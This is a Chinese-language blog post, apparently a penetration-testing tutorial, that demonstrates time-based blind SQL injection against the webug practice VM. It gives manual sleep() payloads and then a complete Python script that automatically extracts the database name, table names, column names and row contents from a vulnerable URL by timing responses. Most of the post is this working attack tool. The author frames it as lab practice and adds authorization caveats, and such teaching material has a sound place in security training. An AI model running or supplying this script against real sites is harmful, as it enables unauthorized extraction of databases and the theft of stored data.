用Python自定义打造的时间盲注脚本

推荐一个自带很多 Web 漏洞练习环境的入门虚拟机——webug,网上有资源,如果嫌镜像太大可以找 Johnson。

最近johnson在测试webug上的一个时间盲注的时候,就想着自己写一个脚本。

访问页面是这样的:

页面提示需要传一个 type 参数。

参数变了,页面也会跟着变化,既然是时间注入,就自己手动测试一下。

Payload1:

192.168.1.107/pentest/test/time/?type=1 and if(substr(database(),1,1)='a',sleep(3),1)

页面直接刷新了,最后不断的尝试,发现当payload为:

192.168.1.107/pentest/test/time/?type=1 and if(substr(database(),1,1)='p',sleep(3),1)的时候,页面会暂停3秒,所以数据库的第一个字母是p。需要注意的是,单次 3 秒的延迟并不能作为定论:网络抖动或服务器负载同样会造成延迟,应当重复请求几次,并用一个肯定为假的条件(例如 'a')做对照,确认只有该字母才稳定触发延迟。为了锻炼自己,手动写了一个简单的,冗余非常大的脚本。

#!/usr/bin/env python

# encoding: utf-8

"""

@version: V1.0

@author: johnson

@file: bool_time.py

@time: 1/2/18 4:24 PM

"""

import time

import requests

s = 3  # Seconds the injected sleep() stalls the server when a probe's condition is true.

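def main():
    """Interactive driver for the time-based blind SQL injection probes.

    Asks for the injectable URL, recovers the current database name, then its
    table names, then (on request) the column names of chosen tables and the
    rows of one column.  Every step is a sequence of HTTP requests whose
    response time is the oracle, so expect many requests and a long runtime.

    Only run this against systems you are authorized to test (e.g. your own
    webug VM).
    """
    url = raw_input("Please input url:")  # e.g. http://192.168.1.105/pentest/test/time/?type=1
    # Candidate characters tried at every position.  Anything outside this set
    # (e.g. '-', '$', '!') cannot be recovered by the probes below.
    payloads = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789@_.}{,"

    print("start get length...")
    length = getDatabaseLength(url)
    if length is None:
        # No candidate length triggered the delay; the target is probably not
        # injectable at this URL (or the sleep threshold is wrong).  Bail out
        # instead of crashing on range(1, None + 1).
        print("could not determine the database name length, stopping")
        return

    print("start database sql injection...")
    database = getDatabaseName(url, length, payloads)
    print("the current database is " + database)

    print("start get table count...")
    table_count = getTableCount(url, database)
    print("the database %s's table count is %d" % (database, table_count))

    print("start get table length...")
    table_length = getTableLength(url, table_count, database)
    print(table_length)

    print("start table sql injection...")
    tables = getTableName(url, payloads, database, table_length)
    print("table name is ")
    printName(tables)

    # Enumerate columns for as many tables as the user asks, then optionally
    # dump one column of the last table before quitting.
    while True:
        table_name = raw_input("Please input table name:")
        columns = getColumnName(url, table_name, database, payloads)
        print("column name is ")
        printName(columns)

        # raw_input() returns "" (never None) on a bare Enter, so the original
        # `is None` default never fired; treat an empty answer as "Y".
        answer = raw_input("Do you want to inject other table name?(Y/n)").strip().lower()
        if answer in ("", "y"):
            continue
        if answer == "n":
            get_data = raw_input("Do you want to test other column?(Y/n)").strip().lower()
            if get_data == "y":
                column_name = raw_input("Please input column name:")
                getDatas(url, payloads, table_name, column_name)
        # Any other answer ends the session, as in the original loop.
        break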

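def getDatabaseLength(url, max_length=50):
    """Return the length of the current database name via the timing oracle.

    Probes ``length(database())={i}`` for ``i`` in ``1..max_length-1``; the
    first request that takes longer than ``s - 1`` seconds is taken as a hit.

    Args:
        url: Injectable URL up to and including the vulnerable parameter value
            (the SQL fragment is appended directly to it).
        max_length: Exclusive upper bound on candidate lengths (default 50,
            matching the original ``range(1, 50)``).

    Returns:
        The detected length, or ``None`` when no candidate triggered the delay.
    """
    for i in range(1, max_length):
        # %23 is a URL-encoded '#', commenting out whatever follows the
        # injection point in the original query.
        probe = "{url} and if(length(database())={i}, sleep({s}),1)%23".format(
            url=url, i=i, s=s)
        started = time.time()
        # The timeout bounds a hung connection; it must stay well above s so
        # the deliberate sleep() is never cut short and misread as "false".
        requests.get(probe, timeout=s * 5)
        # Threshold is s - 1 to tolerate some jitter; a very slow link can
        # still produce false positives, so confirm surprising results.
        if time.time() - started > s - 1:
            print("the length is " + str(i))
            return i
    return None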

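def getDatabaseName(url, length, payloads, fallback="?"):
    """Recover the current database name one character at a time.

    For each position ``1..length`` every character in ``payloads`` is tried
    until one triggers the delay.  The comparison uses ``binary`` so that
    case-insensitive (``*_ci``) collations cannot match 'a' against 'A' and
    silently lower-case the result.

    Args:
        url: Injectable URL (see ``getDatabaseLength``).
        length: Number of characters to recover.
        payloads: Iterable of single-character candidates.  Must not contain
            ``'`` or ``\\`` — they would break the injected string literal.
        fallback: Placeholder appended when no candidate matches a position,
            so later characters keep their correct offset.

    Returns:
        The recovered name (with ``fallback`` at unrecoverable positions).
    """
    database = ""
    for d in range(1, length + 1):
        for payload in payloads:
            probe = ("{url} and if(substr(database(),{d},1)=binary '{payload}', "
                     "sleep({s}),1)%23").format(url=url, d=d, payload=payload, s=s)
            started = time.time()
            requests.get(probe, timeout=s * 5)  # bounded wait, well above s
            if time.time() - started > s - 1:
                database += payload
                print(database)
                break
        else:
            # Original dropped the position entirely, shifting every later
            # character left; keep alignment and make the gap visible.
            database += fallback
            print("position %d: no candidate matched, using '%s'" % (d, fallback))
    return database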

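def getTableCount(url, database, max_count=50):
    """Return the number of tables in ``database`` via the timing oracle.

    Compares the full ``count(*)`` against each candidate.  The original
    compared only ``substr(count, 1, 1)`` — the first digit — so any schema
    with 10 or more tables was reported as having 1..4 tables.

    Args:
        url: Injectable URL.
        database: Schema name, interpolated into a quoted SQL literal.
        max_count: Exclusive upper bound on candidates (default 50).

    Returns:
        The detected count, or 0 when no candidate triggered the delay.
    """
    table_count = 0
    for count in range(1, max_count):
        probe = ("{url} and if((select count(*) from information_schema.tables "
                 "where table_schema='{database}')={count}, sleep({s}),1)%23").format(
            url=url, database=database, s=s, count=count)
        started = time.time()
        requests.get(probe, timeout=s * 5)  # bounded wait, well above s
        if time.time() - started > s - 1:
            table_count = count
            break
    return table_count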

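def getTableLength(url, table_count, database, max_length=21):
    """Return the name length of each of the first ``table_count`` tables.

    Tables are addressed by ``limit {count},1`` over ``information_schema``
    without an ``order by``, so the order is whatever the server returns; it
    is assumed stable across the requests of one run.

    The original compared ``substr(length, 1, 1)`` — the first digit — so a
    12-character name was reported as length 1.  The full length is compared
    here.

    Args:
        url: Injectable URL.
        table_count: Number of tables to measure (from ``getTableCount``).
        database: Schema name, interpolated into a quoted SQL literal.
        max_length: Exclusive upper bound on candidate lengths (default 21).

    Returns:
        A list with exactly ``table_count`` entries; 0 marks a table whose
        length could not be determined, so indexes stay aligned with
        ``getTableName``.
    """
    table_length = []
    for count in range(0, table_count):
        for i in range(1, max_length):
            probe = ("{url} and if((select length(table_name) from information_schema.tables "
                     "where table_schema='{database}' limit {count},1)={i}, "
                     "sleep({s}),1)%23").format(
                url=url, database=database, count=count, i=i, s=s)
            started = time.time()
            requests.get(probe, timeout=s * 5)  # bounded wait, well above s
            if time.time() - started > s - 1:
                table_length.append(i)
                print("the table '%d' length is %s" % (count + 1, i))
                break
        else:
            # Original appended nothing, so later tables were misaligned.
            table_length.append(0)
            print("the table '%d' length was not found (>= %d?)" % (count + 1, max_length))
    return table_length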

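def getTableName(url, payloads, database, table_length, fallback="?"):
    """Recover the table names of ``database`` character by character.

    ``table_length[i]`` is the name length of the i-th table as returned by
    ``limit i,1`` (same ordering assumption as ``getTableLength``).  The
    character comparison uses ``binary`` so ``*_ci`` collations cannot fold
    case.  Unlike the original, the probe ends with ``%23`` like every other
    probe in this file, so trailing SQL at the injection point is commented
    out consistently.

    Args:
        url: Injectable URL.
        payloads: Single-character candidates (no ``'`` or ``\\``).
        database: Schema name, interpolated into a quoted SQL literal.
        table_length: Per-table name lengths.
        fallback: Placeholder for positions no candidate matched.

    Returns:
        One recovered name per entry of ``table_length``.
    """
    tables = []
    for i, name_length in enumerate(table_length):
        table = ""
        for d in range(1, name_length + 1):
            for payload in payloads:
                probe = ("{url} and if(substr((select table_name from information_schema.tables "
                         "where table_schema='{database}' limit {i},1),{d},1)=binary '{payload}', "
                         "sleep({s}),1)%23").format(
                    url=url, i=i, d=d, payload=payload, database=database, s=s)
                started = time.time()
                requests.get(probe, timeout=s * 5)  # bounded wait, well above s
                if time.time() - started > s - 1:
                    table += payload
                    print(table)
                    break
            else:
                table += fallback  # keep later characters at the right offset
        tables.append(table)
    return tables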

def printName(result):
    """Print every entry of ``result`` on its own line, in order."""
    for entry in result:
        print(entry)

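def getColumnCount(url, table_name, database, max_count=50):
    """Return the number of columns of ``table_name`` in ``database``.

    Compares the full ``count(*)``; the original compared only its first
    digit, so tables with 10+ columns were under-counted.

    Args:
        url: Injectable URL.
        table_name: Table name, interpolated into a quoted SQL literal.
        database: Schema name, interpolated into a quoted SQL literal.
        max_count: Exclusive upper bound on candidates (default 50).

    Returns:
        The detected count, or 0 when nothing triggered the delay.
    """
    column_count = 0
    for count in range(1, max_count):
        probe = ("{url} and if((select count(*) from information_schema.columns "
                 "where table_schema='{database}' and table_name='{table_name}')={count}, "
                 "sleep({s}),1)%23").format(
            url=url, database=database, s=s, table_name=table_name, count=count)
        started = time.time()
        requests.get(probe, timeout=s * 5)  # bounded wait, well above s
        if time.time() - started > s - 1:
            column_count = count
            break
    return column_count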

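def getColumnLen(url, column_count, database, table_name, max_length=21):
    """Return the name length of each of the first ``column_count`` columns.

    Columns are addressed by ``limit {count},1`` without ``order by`` (order
    assumed stable within a run).  Compares the full length rather than its
    first digit, which the original did.

    Args:
        url: Injectable URL.
        column_count: Number of columns to measure.
        database: Schema name, interpolated into a quoted SQL literal.
        table_name: Table name, interpolated into a quoted SQL literal.
        max_length: Exclusive upper bound on candidate lengths (default 21).

    Returns:
        A list with exactly ``column_count`` entries; 0 marks an undetermined
        length so indexes stay aligned with ``getColumnName``.
    """
    column_length = []
    for count in range(0, column_count):
        for i in range(1, max_length):
            probe = ("{url} and if((select length(column_name) from information_schema.columns "
                     "where table_schema='{database}' and table_name='{table_name}' "
                     "limit {count},1)={i}, sleep({s}),1)%23").format(
                url=url, database=database, table_name=table_name, count=count, i=i, s=s)
            started = time.time()
            requests.get(probe, timeout=s * 5)  # bounded wait, well above s
            if time.time() - started > s - 1:
                column_length.append(i)
                print("the column '%d' length is %s" % (count + 1, i))
                break
        else:
            column_length.append(0)  # keep alignment instead of dropping the column
            print("the column '%d' length was not found (>= %d?)" % (count + 1, max_length))
    return column_length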

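def getColumnName(url, table_name, database, payloads, fallback="?"):
    """Recover the column names of ``table_name`` character by character.

    Calls ``getColumnCount`` and ``getColumnLen`` first, then probes each
    position of each column with every candidate in ``payloads``.  Uses a
    ``binary`` comparison so case is preserved under ``*_ci`` collations.

    Args:
        url: Injectable URL.
        table_name: Table name, interpolated into a quoted SQL literal.
        database: Schema name, interpolated into a quoted SQL literal.
        payloads: Single-character candidates (no ``'`` or ``\\``).
        fallback: Placeholder for positions no candidate matched.

    Returns:
        One recovered name per column.
    """
    column_names = []
    column_count = getColumnCount(url, table_name, database)
    print(column_count)
    column_len = getColumnLen(url, column_count, database, table_name)
    for k, name_length in enumerate(column_len):
        column = ""
        for d in range(1, name_length + 1):
            for payload in payloads:
                probe = ("{url} and if(substr((select column_name from information_schema.columns "
                         "where table_schema='{database}' and table_name='{table_name}' "
                         "limit {i},1),{d},1)=binary '{payload}', sleep({s}),1)%23").format(
                    url=url, database=database, table_name=table_name, i=k, d=d,
                    payload=payload, s=s)
                started = time.time()
                requests.get(probe, timeout=s * 5)  # bounded wait, well above s
                if time.time() - started > s - 1:
                    column += payload
                    print(column)
                    break
            else:
                column += fallback  # keep later characters at the right offset
        column_names.append(column)
    return column_names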

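def getDataCount(url, table_name, column_name, max_count=50):
    """Return the number of rows in ``table_name``.

    Compares the full ``count(*)`` (the original compared its first digit,
    so 10+ rows were under-counted).  ``column_name`` is accepted for
    interface compatibility but does not affect the row count.

    Args:
        url: Injectable URL.
        table_name: Table name, interpolated unquoted into the query.
        column_name: Unused; kept so existing callers keep working.
        max_count: Exclusive upper bound on candidates (default 50).

    Returns:
        The detected row count, or 0 when nothing triggered the delay.
    """
    data_count = 0
    for count in range(1, max_count):
        probe = ("{url} and if((select count(*) from {table_name})={count}, "
                 "sleep({s}),1)%23").format(
            url=url, column_name=column_name, s=s, table_name=table_name, count=count)
        started = time.time()
        requests.get(probe, timeout=s * 5)  # bounded wait, well above s
        if time.time() - started > s - 1:
            data_count = count
            break
    return data_count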

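def getDataLen(url, table_name, column_name, id, max_length=100000):
    """Return the value length of row ``id`` of ``column_name``.

    ``id`` is the 0-based row offset used in ``limit {id},1`` (no
    ``order by``, so the row order is whatever the server returns), not a
    primary key.  The parameter keeps its original name — shadowing the
    builtin — so positional and keyword callers both keep working.

    ``ifnull(length(...), 0)`` reports a NULL value as length 0; with plain
    ``length()`` a NULL never matches and the loop would burn ``max_length``
    requests.  Candidates are tried linearly from 0, so long values cost one
    request per candidate length.

    Args:
        url: Injectable URL.
        table_name: Table name, interpolated unquoted into the query.
        column_name: Column name, interpolated unquoted into the query.
        id: 0-based row offset.
        max_length: Exclusive upper bound on candidate lengths.

    Returns:
        The detected length, or 0 when nothing triggered the delay.
    """
    data_len = 0
    for candidate in range(0, max_length):
        probe = ("{url} and if((select ifnull(length({column_name}),0) from {table_name} "
                 "limit {id},1)={l}, sleep({s}),1)%23").format(
            s=s, l=candidate, id=id, table_name=table_name, column_name=column_name, url=url)
        started = time.time()
        requests.get(probe, timeout=s * 5)  # bounded wait, well above s
        if time.time() - started > s - 1:
            print("the data '%d' length is %d" % (id, candidate))
            data_len = candidate
            break
    return data_len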

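def getDatas(url, payloads, table_name, column_name, fallback="?"):
    """Dump every value of ``column_name`` in ``table_name``.

    Rows are addressed by ``limit {i},1`` without ``order by``; the order is
    assumed stable for the duration of the run.  Character positions start
    at 1 (``substr`` is 1-based; position 0 yields '' and never matches).
    The original built the list but never returned it — it is returned here.

    Args:
        url: Injectable URL.
        payloads: Single-character candidates (no ``'`` or ``\\``).
        table_name: Table name, interpolated unquoted into the query.
        column_name: Column name, interpolated unquoted into the query.
        fallback: Placeholder for positions no candidate matched.

    Returns:
        The recovered values, one string per row.
    """
    datas = []
    data_count = getDataCount(url, table_name, column_name)
    print("the data's count is %d" % (data_count))
    for i in range(0, data_count):
        data = ""
        data_len = getDataLen(url, table_name, column_name, i)
        print("the data's len is %d" % (data_len))
        for j in range(1, data_len + 1):
            for payload in payloads:
                probe = ("{url} and if(substr((select {column_name} from {table_name} "
                         "limit {i},1),{j},1)=binary '{payload}', sleep({s}),1)%23").format(
                    url=url, column_name=column_name, table_name=table_name,
                    payload=payload, j=j, s=s, i=i)
                started = time.time()
                requests.get(probe, timeout=s * 5)  # bounded wait, well above s
                if time.time() - started > s - 1:
                    data += payload
                    print(data)
                    break
            else:
                data += fallback  # keep later characters at the right offset
        datas.append(data)
    return datas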

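# Script entry point; `if__name__` in the original was a garbled `if __name__`.
if __name__ == '__main__':
    main()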

最后的结果就是:

代码写的比较随意,只是希望多交流学习。请仅在自己搭建的靶机(如 webug)或已获得书面授权的目标上运行这类脚本。

本文来自企鹅号 - 计科信安媒体
